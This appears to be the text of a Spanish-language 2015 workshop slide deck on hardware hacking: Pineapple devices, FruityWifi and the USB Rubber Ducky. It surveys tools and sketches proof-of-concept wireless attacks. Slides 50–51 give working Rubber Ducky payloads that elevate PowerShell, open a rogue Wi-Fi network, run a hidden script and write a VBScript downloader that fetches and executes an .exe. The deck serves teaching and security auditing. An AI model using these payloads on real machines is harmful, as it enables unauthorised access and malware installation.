Este documento presenta a Jaime Álvarez y Roberto García, dos expertos en seguridad informática y hardware hacking. Describe brevemente sus antecedentes y experiencia y luego proporciona detalles sobre varias herramientas y técnicas de hardware hacking, incluidos Pineapple Mark IV, Raspberry Pi con FruityWifi, USB Rubber Ducky y más. Finalmente, incluye algunos ejemplos prácticos de cómo usar estas herramientas para realizar auditorías de red.

1. Jaime Álvarez y Roberto García
Hardware Hacking
Except where otherwise noted, this work is licensed under:
http://creativecommons.org/licenses/by-nc-sa/3.0/

2. 2

3. 3
¿Quiene$ $omo$?
Jaime Álvarez:
• Es un apasionado del mundo de la Informática, siempre ha estado muy
relacionado con la Seguridad Informática y la Calidad del Software.
• Ha trabajado durante muchos años en el departamento de Calidad del
Software y Administración de Sistemas en empresas estatales y privadas .
• Es componente de Bugtraq- Team, un proyecto que está dedicándose a la
implantación de un Sistema Operativo orientado a la Seguridad
Informática.
• Ha impartido talleres sobre hardware hacking en diversas conferencias.
Roberto García:
• Es consultor de seguridad en InnotecSystem. Cuenta con más de 10 años
de experiencia como Administrador de sistemas Windows, trabajando
para empresas multinacionales líderes del sector. Es MCSA de Microsoft
2012 Server.
• Es autor del blog 1gbdeinformacion, ganador del premio “Héroe Digital”
de ESET en 2013 y finalista en 2014.

4. Hardware Hacking –Piñas, Alfas y demás…
Leganés
12-13 Febrero
2015
4

5. Hardware Hacking
¿¡ Por que este taller !?
“Estamos acostumbrados a
usar los medios (...) como
algo comunitario sin tener
en cuenta los peligros
existentes... no solo
descuidando nuestra
privacidad y seguridad, si
no también nuestras
obligaciones respecto a
estas...”

6. Hardware Hacking
¿Que es el Hardware Hacking?
● Herramientas que se basan en hardware para facilitar
el trabajo en un “escenario” tanto ofensivo como
defensivo.
● Las herramientas se sustentan por un firmware y/o un
software interno o externo.
● Suelen ser herramientas multidisciplinares.
● Hardware y software pre-configurado y de fácil uso.
● Interfaces muy intuitivas.
● Normalmente portables y/o autónomas.

7. Throwing Star LAN Tap
● Hardware Hacking puro (no requiere de
software)
● Pasivo (No alimentado)
● Monitoriza BASE10-T, 100BASE-T y RS-
232 DB9 (puerto serie)
● Puede monitorizar 1000BASE-T
(renegociando la velocidad)
● Dos condensadores pF 220 para hacer
el bypass del par extra que requiere el
1000BASE-T
● Los puertos J3 y J4 son solo receptores
● Dos jacks RJ45 para la red
monitorizada (I/O)
● Dos jacks RJ45 independientes para la
monitorización ( J1-J3 / J2-J4)

8. WIRELESS HARDWARE
HACKING
Firmware utilizado:
● OpenWRT o DD-WRT (uso comercial)
● Modificaciones de OpenWRT
¿Por que OpenWRT?
● Costes / Licencia GPLv2
● Ultralijero y compacto.
● Firmware adaptable (+3500 paquetes de
software)
● Diseñado para sistemas embebidos

9. Beini WIFIROBIN 2
Especificaciones Técnicas:
● Chipset Atheros AR9331 400Mhz
● 1x IEEE 802.11b/g/n
● 2x Ethernet 100BASE-T
● 1x USB (multi-disciplinar)
● Software OpenWRT (Beini)
● Alimentación Externa 5V/2A
● Antena alta ganancia (5dB) PR-SMA
● Soporta WEP, WPA y WPA2
● Función de Router, Punto de
Acceso, modo repetidor.
● Cracking WEP y WPA

10. Beini WIFIROBIN 2
Características técnicas:
● Router
● Punto de Acceso (AP)
● Repetidor
● Recuperación claves WEP y WAP
La recuperación de claves WEP se hace
mediante la suite aircrack con inyección
de paquetes. Sin embargo de las
claves WAP se hace necesario un
diccionario que podemos ampliar por
USB ya que se realiza mediante ataque
de Fuerza Bruta.

11. PINEAPPLE MARK IV
Especificaciones:
● OpenWRT modificado
● Chip: 400 MHz MIPS Atheros
AR9331 (IEEE) 802.11 b/g/n)
8Mb RAM / 32Mb ROM
● 1x USB
● 2x 100BASE-T Ethernet (LAN / WAN)
● 1X botón “WPS” configurable a 5
acciones distintas (según
pulsaciones)
● Ya no tiene soporte oficial

12. ALFA AP121U ==
MARK IV
=
=
=

13. ALFA NETWORK AP121U /
HORNET-UB
● La tarjeta ALFA AP121U se
basa en la placa HORNET-UB
(existen 2 modelos)
● Modelo con Memoria Flash
8M/32M
● U-BOOT (bootloader)
● Soporta OpenWRT
● Modulo conversor USB
2.0 a TTL UART 6PIN
CP2102
● Flash Firmware a
Pineapple Mark IV

14. PINEAPPLE MARK IV
WiFi Pineapple Mark IV es un dispositivo que permite
realizar ataques man-in-the-middle, Karma, DNS
Spoofing, SSLstrip, desautentification, tcpdump, incluso
ataques de Phishing. La versatilidad se encuentra en la
posibilidad de adaptar nuestro dispositivo mediante
infusiones.
Las Infusiones son “añadidos” que podremos
programar nosotros mismos o descargados del
Pineapple Bar. La infusiones mas conocida de este
dispositivo son KARMA y SSLstrip.

15. MARK IV GUI

16. PINEAPPLE MARK IV
KARMA es un set de herramientas para la evaluación de
clientes inalámbricos en distintas capas. Las herramientas
de descubrimiento a través de Wireless sniffing, captan
los clientes cercanos y sus redes preferidas mediante la
escucha pasiva de paquetes Probe Request.

17. POC MARK IV / KARMA

18. RASPBERRY PI (FruityWifi)
FRUITYWIFI
● Desarrollador: xtr4nge
● RaspDebian con Pwnpi
● https://github.com/xtr4nge/FruityWifi/
RASPBERRY B / B+
● ARM 700 MHz (ARM11)
● 512 MiB (compartidos con la
GPU)
● HDMI
● RCA / HDMI / DSI
● 3,5mm Audio Jack
● 8 x GPIO, SPI, I²C, UART
● 5v microUSB
● 2 / 4 USB 2.0

19. FruityWifi
FruityWifi : es una herramienta de código abierto para auditoria de redes
wireless. Permite desplegar rápida y fácilmente ataques avanzados
utilizando la interfaz web o enviándole mensajes. Inicialmente la aplicacion
fue creada para utilizarse con una Raspberry-Pi, pero puede ser instalada
en cualquier sistema basado en Debian.
FruityWifi : se compone de módulos para darle más flexibilidad. Algunos de
los modulos disponibles son URLsnarf, DNSspoof, Kismet, mdk3, ngrep,
nmap, Squid3 y SSLstrip (con funcionalidades para inyectar código), Captive
Portal, AutoSSH, Meterpreter, Tcpdump, etc...
NOVEDAD : FruityWifi v2.0 trae muchas novedades. Una nueva
interfaz, nuevos módulos, soporte para chipsets Realtek, soporte
para Mobile Broadband (3G/4G), un nuevo panel de configuración, y
más.

20. FruityWifi 2.0 Gui / Modulos

21. FruityWifi - WHATSapp

22. POC MARK IV / sslstrip

23. POC MARK IV / Phishing

24. 24
PINEAPPLE MARK
V
En Noviembre de 2013 se sacó un nuevo
hardware más avanzado con dos antenas de red
como se ha visto.
La GUI del sistema se ha renovado
completamente y está en continua evolución
debido a que es el sistema mas actual y está
bajo soporte.
Debido al puerto de expansión se espera que
este modelo sea mas duradero y ya han salido
nuevos gadgets, como puede ser una caja para
contener dos Mark V conectadas en red, una
placa de expansión para controladores externos
o cajas de ocultación parecidas a “la alarma de
mi casa”.

25. PINEAPPLE MARK V
● 1x IEEE 802.11b/g/n Radio, AR9331
● 1x IEEE 802.11a/b/g Radio, RTL8187
● Procesador MIPS a400Mhz
● Memoria 64MB DDR2
● Memoria flash 16MB
● 1x USB 2.0
● 1x 100BASE-T Ethernet.
● Ranura Micro-SD
● Modos de arranque mediante
Switches
● Indicadores LED
● Puerto de Expansión
● Serial TTL
● OpenWRT modificado y FailSave

26. PINEAPPLE MARK V

27. GUI - MARK V

28. MARK V / poc - PINEAPP

29. MARK V / poc - ccupineapple

30. MARK V / poc - Evilportal

31. MARK V / POC - ADS-B tracker

32. USB RUBBER
DUCKY
Especificaciones:
● 60Mhz 32-bit CPU
● Botón de repetición
● Indicador LED
● 1X USB Tipo A 2.0
● Puerto Micro-SD
(128Mb)
● Carcasa de ocultación

33. USB RUBBER
DUCKY
Características técnicas:
● Soporta Multi HID (12 idiomas)
● Firmware amoldable
● Encoder Multiplataforma
● Soportado para Windows /
Unix / OSX / Android / IOS
● Encoder con soporte de
múltiples comandos
(Alt+Contol+Supr)
● VID & PID manipulables

34. USB RUBBER
DUCKY
DESGLOSE DE COMANDOS del
Encoder:
● DELAY x- Espera x milisegundos
● STRING xxx – Escribe xxx
● GUI – Tecla Windows
● GUI R – Windows + R (ejecutar)
● Command – Tecla de comando OSX
● ENTER – Intro
● SPACE – Espacio
● REPEAT x – Repite comando anterior
x veces
● CAPS |CAPSLOCK – Bloqueo
Mayúsculas
● UP | UPARROW – Tecla arriba
● DOWN | DOWNARROW –
Tecla abajo
● LEFT | LEFTARROW – Tecla
izquierda
● RIGHT | RIGHTARROW – Tecla
derecha
● SHIFT – Shift
● DEL – Borrar
● CONTROL – Control

35. USB RUBBER
DUCKY
OTRO FIRMWARE DISPONIBLE:
● duck.hex (Duck(Original))
● usb.hex (FAT Duck)
● m_duck.hex (Detour Duck (formerly
Naked Duck))
● c_duck.hex (Twin Duck)
● cm_duck.hex alpha(unamed)

36. PoC Rubber DUCKY: UBUNTU
14.04

37. Seguridad PERIMETRAL

38. Seguridad PERIMETRAL

39. Seguridad PERIMETRAL
 No se establece una
política de actualizaciones.
 No se establece una
política de configuraciones
en el router.
 No se realiza “hardering”
sobre la red local,
servidores, ni equipos de
trabajo.
 Ni que pensar del “Bring
your own device”

40. ES HORA DE
VOLVERSE EL
MALO
;-P

41. POC SEGUIMIENTO
PINEAP

42. POC Seguimiento INFORMACIÓN

43. POC ANALIZANDO REDES

44. POC ATAQUE 1 (EL PLATO)

45. POC ATAQUE 1 (RECETA)
Material necesario:
 1 Drone
 1 Piña o más... (añadir mas piñas para ocultar “el
sabor”)
 1 PC
 Antenas lo suficientemente potentes.

46. POC ATAQUE 2 (Preparando la piña)
INFUSIONES y MeDIOS:
 Infusión WPS
 Modo cliente
 PC
Objetivo:
 Posicionar y controlar nuestra piña lo mas cerca del
router de la empresa.
 Aprovechar una mala configuración para conectarnos
como usuarios legítimos en la red.

47. POC ATAQUE 1 (COCINANDO)
 Piña1 Wlan0 ataca wps
 Piña2 Wlan1 conecta modo
cliente con Piña1 Wlan0-1 para
control (red protegida WPA2
SSL)
 Piña2 Wlan0-1 o Piña2 Ethernet
quedan libres para control de
Piña2 desde nuestro PC y de ahí
tendremos acceso a Piña1
Wlan0-1
 Una vez finalizado el ataque
WPS de Piña1 conectamos
Piña1 Wlan1 en modo cliente
con WlanVictima dandonos
acceso a Piña1 desde Piña1
Wlan0-1 a traves de Piña2
Wlan1 y Piña2 Wlan0-1 a su vez
desde el PC.

48. POC Ataque 1 (RESULTADO)

49. POC ATAQUE 2 (PLAN B)

50. POC PLAN B PATO 1
DELAY 750
GUI m
GUI r
DELAY 500
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 500
ALT s
DELAY 500
ENTER
STRING netsh wlan set hostednetwork
ssid=SSIDFALSO key=Clave+Falsa
ENTER
STRING netsh wlan start hostednetwork
ENTER
STRING Remove-Item $MyINvocation.InvocationName
ENTER
CTRL G
DELAY 500
STRING C:Windowsconfig-25381.ps1
ENTER
DELAY 500
ALT F4
DELAY 500
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 500
ALT s
DELAY 500
STRING mode con:cols=14 lines=1
ENTER
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
DELAY 500
STRING powershell.exe -windowstyle hidden -File C:Windowsconfig.ps1
GUI l
ENTER

51. POC PLAN B PATO 2
ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
ENTER
DELAY 400
STRING copy con download.vbs
ENTER
STRING Set args = WScript.Arguments:a = split(args(0),
"/")(UBound(split(args(0),"/")))
ENTER
STRING Set objXMLHTTP =
CreateObject("MSXML2.XMLHTTP"):objXMLHTTP.open "GET",
args(0), false:objXMLHTTP.send()
ENTER
STRING If objXMLHTTP.Status = 200 Then
ENTER
STRING Set objADOStream =
CreateObject("ADODB.Stream"):objADOStream.Open
ENTER
STRING objADOStream.Type = 1:objADOStream.Write
objXMLHTTP.ResponseBody:objADOStream.Position = 0
ENTER
STRING Set objFSO =
Createobject("Scripting.FileSystemObject"):If
objFSO.Fileexists(a) Then objFSO.DeleteFile a
ENTER
STRING objADOStream.SaveToFile a:objADOStream.Close:Set
objADOStream = Nothing
ENTER
STRING End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing
ENTER
CTRL z
ENTER
STRING cscript download.vbs <METEMOS LA URL AQUI>
ENTER
STRING <METEMOS EL ARCHIVO .EXE AQUI>
ENTER
STRING exit
ENTER

52. POC ATAQUE 3 (PLAN C)
Usando el ambientador...

53. POC ATAQUE 3 (PLAN C)
Ocultando el Olor
Foto de David de Roman

54. OTRO HARDWARE
Teensy v3.1 HackRF One

55. Para aladdin gurbanov
Persona, hacker y compañero.

56. MUCHAS
GRACIAS!
Jaime Álvarez de Aldecoa
Twitter: @KioArdetroya
E-mail: jaime.alvarezdealdecoa@gmail.com
Roberto García Amoriz
Twitter: @1GbDeInfo
E-mail: 1gbdeinformacion@rogaramo.com
Blog: www.1gbdeinformacion.com